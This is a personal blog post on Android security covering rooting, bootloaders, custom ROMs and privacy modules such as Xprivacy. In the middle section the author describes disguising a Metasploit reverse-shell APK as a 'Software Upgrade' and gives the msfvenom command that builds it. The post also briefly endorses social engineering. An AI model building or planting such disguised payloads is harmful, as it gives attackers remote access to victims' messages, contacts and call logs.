Updated April 15, 2023
Introduction to Android
In this Topic, we will learn about Android and Open Source Security (OS). Android is an Open Source Platform. It is much like Linux but still way too different from Linux. Linux is far too mature when compared to Android. So, this is Chetan Nayak, and welcome to my next blog on Open Source Web Security. I have written this blog assuming most of us would be using Android K, i.e., Kitkat, or Android L, i.e., Lollipop.
The reason is Gingerbread and Jellybean had lots of open-source security issues, which I cannot discuss in this single blog. So, maybe I will discuss it next time when I dwell deeper into the older versions of it. So, as of now, let’s stick with KitKat and Lollipop.
Security controls reduce the burden on developers. It was for the developers. Security-savvy developers can easily work with and rely on flexible security controls. Safe defaults will protect developers who are less familiar with security.
I was not much into Android until the last quarter of 2013 when I had my first Android Cell Phone, a Sony Xperia L(based on 4.2.2 as of then). I even hated Android because it was extremely laggy, especially Samsung devices. I even considered buying a Windows Lumia back then, but fortunately, I used to play many games, and I had to buy Xperia L since this cell was Lag Proof. It had about one gig of RAM and Adreno 305. Cool enough to run anything.
After playing many games like NOVA3 and ModernCombat4, I couldn’t find it interesting. I knew that it was based on Linux, and I wanted to do some of my modifications to that. I started reading about Customizations and learned what was called ‘Rooting’. Since I had a good backhand in Linux, rooting was not an issue. With a bit of XDA’s help, I could root my cell successfully.
But then, something struck me. As soon as my cell restarted after rooting, it started boot-looping (stuck on the boot screen forever). I didn’t even know what bootloader was in Android. So, there was nothing I could do. It was just one month after I bought my new cell, and it was now soft-bricked. As I kept reading one and every other stuff on rooting, I learned that rooting does not brick your phone. I always read rooting is dangerous, but I didn’t know it would brick my Cell. But I was wrong.
Rooting is similar to Admin Access in a Computer (Actually, it is a System Access, but I wrote Admin Access, so it is easy to understand for noobs.). This means rooting will never brick your phone. It was the bootloader that bricked my phone. For people who don’t know bootloader is, the bootloader is similar to BIOS in Windows. (If you don’t know what BIOS is, then you shouldn’t even read thinking about security in the first place.) Bootloader or Hboot(what it’s called in Android) s the first thing that runs when you boot up your Android device.
It packages the instructions to boot the operating system kernel, specifically designed to run its own debugging or modification environment.
The Security CheckPoint of Android
Think of the bootloader as the Security checkpoint of your device. If you break this checkpoint, you will lose everything you have on your phone. So, it is a good security feature, I say. Because if you lose your phone, and someone tries to gain root access to bypass the lock (assuming you have locked your device with a pin or password.), he will compulsorily have to unlock the bootloader, which will result in erasing your data on the phone.
So you don’t have to worry about someone misusing it. So, similar is the case with custom ROMS. ROMs are operating systems based on Android versions designed for your hardware architecture. So, if you check on XDA for your phone, you will have n number of customized ROMs for your phones, some of the most famous being Cyanogen Mod ROMs, which are already pre-rooted and come with a pre-defined set of customizations.
The Security OverRide of Android
You may be thinking, as of now, that you have a secure cell phone. But I am here to prove you wrong again; that is this blog’s whole point. By the second quarter of 2014, people had already started developing exploits and rootkits for Android, which could root your cell phones without unlocking the bootloaders.
Is that not scary enough? Let me tell you the most dangerous part. They could even install Trojans inside that. So, even if the cops could trace the cell and you even get it back, there is still a high risk that they could see everything you do on your phone. This is something that I have tried as an experiment in an actual practical environment.
I used Metasploit for this attack. What I did was I created a Trojan and installed it in the target phone. It was a simple apk file, and I named it a Software Upgrade. So, if the user is just a common man with only a bit and a byte of security info, he won’t even dare to remove it. And I ensured that whenever the internet was activated, the malware I created would automatically execute itself and connect back to my remote port on the host machine.
Following commands were used for the attack (Metasploit is a penetration testing software that helps check vulnerabilities on a platform or specific devices.)
My Host IP Address: 192.168.xx.xx
My Host port (to connect back to): 445
>>>msfvenom android/meterpreter/reverse_tcp LHOST=192.168.xx.xx LPORT=445 > SoftwareUpgrade.apk
So, here I created a reverse TCP channel on my computer. So, every time the internet starts on the Android, I will get a shell opened on my Kali machine or the machine where I have installed Metasploit.
So, now you know how scary it is for a person you don’t remember to have records of every transaction you do through your Cell, other contact, WhatsApp messages, SMS, Viber, and Skype call log. If that isn’t scary, then I don’t know what is.
Enough about Security issues. We all know that every other platform has security issues. How could we be secure, then? This is not exactly true. Platforms can be safe up to a specific point, but after that, it’s up to us to ensure it stays that way. There is an infamous quote in the world of Security:
“Social Engineering: Because there is no patch for Human Stupidity.”
I heard this phrase long ago while watching a Conference at DefCon.
When there is no technical vulnerability to exploit, you should try to hack humans. And by that, I don’t mean hypnotism and stuff. I mean Social Engineering. You can read my other blog, “Importance of Cyber Security in our day-to-day life,” for more info about this.
Core Security Function of Android
Besides social engineering, which can only be taken care of if you are smart, there are ways to develop Android applications in a secure way to ensure it stays that way.
So here are some of the core security features that help you build secure apps:
- The Android Application Sandbox isolates your app data and code execution from other apps.
- An application framework with robust implementations of common security functionality such as cryptography, permissions, and secure IPC.
- An encrypted filesystem that can be enabled to protect data on lost or stolen devices.
- User-granted permissions to restrict access to system features and user data.
- Application-defined permissions to control application data on a per-app basis.
What can you do if you want a Secure Environment without a developer?
Android 5, i.e., Lollipop, provides a feature where users can add multiple profiles and restricted phone and tablet modes. Besides, if you have rooted your phone, there are Android apps in Xposed modules, such as AppOps, Xprivacy, or Privacy Guard which can help you take care of almost everything. You need to install the Xposed Framework for that.
Xposed Framework is what allows Xposed modules to work. Xposed modules allow you to change the behavior of Apk and System files without installing a different ROM. It’s also easy to undo the changes, so there is little risk here, and it isn’t even time-consuming since there is no need to flash multiple ROMS, kernels, and bug fixes.
As for me, I prefer to choose Xprivacy. Xprivacy, Privacy Guard, and AppOps are modules of exposure that allow you to secure your Android by choosing which app should have access to, such as the internet, keyboard, sdcard, root access, and lots of other stuff. You can even disable access to only specific services and create user-defined templates. But here is some info or differences if you beg to differ to choose between the above three.
The main limitation of AppOps is that Google only lets you block access to those apps it wants you to stop. Google originally introduced this in Android 4.3. (This is the main reason I do not support it. I do not trust Google. Call it Paranoia, but Google traces everything you do. And I don’t need someone to keep track of everything I do, but if you trust Google, go for it.).
That means if you want to block apps related to Google, such as Play Services(which consumes more than 50% of your normal memory, battery, and data(internet)), you won’t be able to. This is one more reason for me to hate Google. So, I believe that AppOps is nothing but malware for me. (but that’s just me thinking that way. It’s not if you trust Google sole heartedly)
Privacy Guard is a simple-to-use interface that replaces AppOps with Cyanogen Mod. If you are a beginner, I suggest you use this since it has only a toggle on-off button and self-defined templates to which kind of app you should have access. This isn’t that secure if there is malware that acts or impersonates a system app. But it is good for a starting phase.
Xprivacy is in one tool. But it is for Experts. You can compare it with a Swiss Army Knife. It has everything in it and can make your phone secure in every other way, but if you don’t know what you are doing, it will only mess up your phone and stop apps from starting. You can also restrict access to System Apps. This one is what I prefer to choose.
Besides the above modules, there are other modules, such as Lightening Firewall or BootManager in Xposed, which can help restrict access to the internet for specific apps and stop apps from booting alongside the system when restarting a phone.
So, that would be it for this blog. In case of security concerns, you can surely visit or be a member of the XDA website, which can grant you much more privacy information.
This has been a guide to Android. Here we discussed the Basic Concept, Security checkpoints, and Core Security functions of Android. You can also go through our other suggested articles to learn more –